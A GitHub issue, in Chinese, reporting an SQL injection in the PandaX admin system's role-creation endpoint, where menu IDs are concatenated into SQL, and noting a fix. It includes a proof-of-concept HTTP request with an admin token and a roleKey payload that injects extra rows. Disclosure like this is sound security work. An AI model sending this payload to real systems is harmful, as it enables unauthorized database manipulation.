We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
修改角色信息这里
PandaX/apps/system/router/role.go
Lines 49 to 61 in 3d26520
进入 InsertRole 或者 UpdateRole 这两个函数
PandaX/apps/system/api/role.go
Lines 51 to 82 in 3d26520
之后会进入 r.RoleMenuApp.Insert(insert.RoleId, role.MenuIds) 此处存在 sql 语句拼接,没有使用预编译,可以进行拼接执行 sql 注入
r.RoleMenuApp.Insert(insert.RoleId, role.MenuIds)
PandaX/apps/system/services/role_menu.go
Lines 31 to 53 in 3d26520
漏洞验证
POST http://127.0.0.1:7788/system/role HTTP/1.1 Host: 127.0.0.1:7788 sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8" Origin: http://127.0.0.1:7788 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 sec-ch-ua-platform: "macOS" Accept: */* Content-Type: application/json Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 X-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVc2VySWQiOjEsIlRlbmFudElkIjowLCJPcmdhbml6YXRpb25JZCI6MiwiVXNlck5hbWUiOiJwYW5kYSIsIlJvbGVJZCI6MSwiUm9sZUtleSI6ImFkbWluIiwiRGVwdElkIjowLCJQb3N0SWQiOjQsImV4cCI6MTcxMDU5Mjk1MiwiaXNzIjoiUGFuZGFYIiwibmJmIjoxNzA5OTg3MTUyfQ.tz99RC1K83NjuNVNlw2p2Shq1gS1Y2MVTbbhR1_610Q If-Modified-Since: Sat, 09 Mar 2024 08:08:22 GMT Connection: close Content-Length: 96 {"roleName":"11","roleKey":"tes12'),(114,514,'123');#","roleSort":2,"menuIds":[106],"apiIds":[]}
The text was updated successfully, but these errors were encountered:
[fix]使用gorm对象存储 CreateInBatches
Sorry, something went wrong.
No branches or pull requests
pandax sql 注入
修改角色信息这里
PandaX/apps/system/router/role.go
Lines 49 to 61 in 3d26520
进入 InsertRole 或者 UpdateRole 这两个函数
PandaX/apps/system/api/role.go
Lines 51 to 82 in 3d26520
之后会进入
r.RoleMenuApp.Insert(insert.RoleId, role.MenuIds)
此处存在 sql 语句拼接,没有使用预编译,可以进行拼接执行 sql 注入
PandaX/apps/system/services/role_menu.go
Lines 31 to 53 in 3d26520
漏洞验证
The text was updated successfully, but these errors were encountered: